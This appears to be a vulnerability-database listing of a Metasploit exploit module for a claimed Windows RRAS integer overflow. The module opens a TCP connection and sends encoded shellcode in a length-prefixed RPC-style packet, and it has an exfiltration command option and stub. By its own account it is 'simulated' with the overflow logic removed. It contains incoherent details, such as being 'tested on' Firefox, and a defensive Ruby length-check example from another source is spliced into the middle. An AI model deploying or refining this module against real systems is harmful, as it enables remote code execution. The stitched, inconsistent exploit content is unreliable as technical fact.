Microsoft Windows RRAS Integer Overflow

31 Mar 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Views: 114

Simulated Windows RRAS integer overflow over TCP: the module sends a crafted packet intended to trigger a heap overflow and code execution.

Code
    ======================================================================================================================
    | # Title     : Windows RRAS Integer Overflow                                                                        |
    | # Author    : indoushka                                                                                            |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                     |
    | # Vendor    : https://microsoft.com                                                                                |
    ======================================================================================================================
    
    [+] Summary    : This Metasploit module simulates a remote exploitation attempt against a hypothetical integer overflow vulnerability in Windows RRAS,
                     which could lead to a heap-based overflow and potential remote code execution.
                     The module establishes a TCP connection to the target, constructs a simplified RPC-like packet containing encoded payload data, and sends it to the service.
                     It includes configurable options such as target host, port, callback port, and an optional command parameter for payload execution context.
                     The exploit logic is intentionally simplified, with the unsafe or broken decoder and overflow mechanisms removed. Additional features such as exfiltration handling are stubbed out for safety and stability.
                     The module also includes a basic connectivity check stub and uses standard Metasploit payload handling (payload.encoded) to generate shellcode.
    [+] POC   :
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = Msf::Exploit::Rank::Great
    
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Windows RRAS Integer Overflow RCE (CVE-2026-26111)',
          'Description'    => %q{
            This module simulates exploitation of an integer overflow in RRAS leading to heap overflow.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [
            'indoushka'
          ],
          'References'     => [
            ['CVE', '2026-26111'],
            ['MSKB', 'KB5084597']
          ],
          'Platform'       => 'win',
          'Targets'        => [
            [ 'Windows 11 x64', { 'Arch' => ARCH_X64 } ]
          ],
          'DefaultOptions' => {
            'RPORT'    => 4444,
            'WfsDelay' => 30
          },
          'Payload' => {
            'Space'    => 4096,
            'BadChars' => "\x00"
          },
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2026-03-22'
        ))
    
        register_options([
          Opt::RHOST(),
          OptPort.new('CALLBACK_PORT', [true, 'Callback port', 4445]),
          OptString.new('EXFIL_CMD', [true, 'Command', 'whoami'])
        ])
      end
    
      def generate_payload
        payload.encoded
      end
    
      # Simplified RPC-like framing: 2-byte version (5.0), 1-byte packet type
      # (0x0b, the DCE/RPC bind type), 4 reserved bytes, a 4-byte little-endian
      # body length, then the body itself.
      def build_packet(shellcode)
        pkt  = "\x05\x00"                        # RPC version 5.0
        pkt << "\x0b"                            # packet type
        pkt << "\x00\x00\x00\x00"                # reserved / flags (unused here)
        pkt << [shellcode.length].pack('V')      # body length, little-endian uint32
        pkt << shellcode                         # body

        pkt
      end
    
      def exploit
        print_status("Connecting to target #{rhost}:#{rport}...")
    
        connect
    
        shellcode = generate_payload
        packet    = build_packet(shellcode)
    
        print_status("Sending payload (#{packet.length} bytes)...")
        sock.put(packet)
    
        handler
        disconnect
      end
    
      def start_exfiltration_server
        print_status("Exfiltration feature disabled in corrected version (logic stub).")
      end
    
      def check
        print_status("Basic check not implemented (safe stub).")
        Exploit::CheckCode::Unknown
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
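The summary and the module above describe an integer overflow in how a receiver handles the length-prefixed packet the module builds. The following Ruby is an added example, not code from the original post or from the module's author: it parses that same 11-byte-header layout defensively and shows, side by side, the 32-bit length check an overflow-prone receiver gets wrong and the check that cannot wrap. The receiver buffer size (BUF_SIZE) and the sample packets are assumed and constructed values, not real RRAS behaviour or traffic.

```ruby
# Added example (not part of the original post): a defensive parser for the
# simplified RPC-like packet layout built by build_packet above:
#   2 bytes version (0x05 0x00), 1 byte type (0x0b), 4 reserved bytes,
#   4-byte little-endian body length, then <length> bytes of body.

HEADER_LEN = 11
BUF_SIZE   = 4096            # assumed size of the receiver's heap buffer
U32        = 0xFFFFFFFF

# The overflow-prone check: header + declared length is summed in 32 bits,
# so a huge declared length wraps to a small total and passes the bound,
# while the copy that follows still uses the huge length.
def vulnerable_accepts?(declared_len, buf_size = BUF_SIZE)
  total = (HEADER_LEN + declared_len) & U32
  total <= buf_size
end

# The corrected check: compare the declared length against the room left
# after the header. Nothing here can wrap.
def safe_accepts?(declared_len, buf_size = BUF_SIZE)
  declared_len <= buf_size - HEADER_LEN
end

# Parse a packet into its fields, refusing anything whose declared length
# exceeds the buffer or disagrees with the bytes actually present.
def parse_packet(pkt, buf_size = BUF_SIZE)
  return { status: :short_header } if pkt.bytesize < HEADER_LEN

  version  = pkt.byteslice(0, 2).unpack('CC')
  ptype    = pkt.getbyte(2)
  declared = pkt.byteslice(7, 4).unpack1('V')
  body     = pkt.byteslice(HEADER_LEN, pkt.bytesize - HEADER_LEN) || ''

  return { status: :bad_version, version: version } unless version == [5, 0]
  return { status: :oversized, declared: declared } unless safe_accepts?(declared, buf_size)
  return { status: :truncated, declared: declared, actual: body.bytesize } if body.bytesize != declared

  { status: :ok, ptype: ptype, body: body }
end

# Build a packet in the same layout. Constructed sample data, not real traffic;
# declared_len may be set independently of the body to model a lying header.
def build_sample(body, declared_len = body.bytesize)
  "\x05\x00\x0b\x00\x00\x00\x00".b + [declared_len].pack('V') + body.b
end

if __FILE__ == $PROGRAM_NAME
  good = build_sample('A' * 16)
  lying = build_sample('A' * 16, 0xFFFFFFF8)   # 11 + len wraps to 3 in 32 bits
  p parse_packet(good)[:status]                # :ok
  p parse_packet(lying)[:status]               # :oversized
  p vulnerable_accepts?(0xFFFFFFF8)            # true  (wrapped total is 3)
  p safe_accepts?(0xFFFFFFF8)                  # false
end
```

The design point is the order of operations in the length check: subtracting the header from the buffer size and comparing against the declared length keeps every intermediate value within range, whereas adding the declared length to the header size first is exactly the step that wraps.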


31 Mar 2026 00:00 (current)
Risk: 6.1 (Medium)
Vulners AI Score: 6.1
CVSS 3.1: 8
EPSS: 0.0009
SSVC: (none)
Views: 114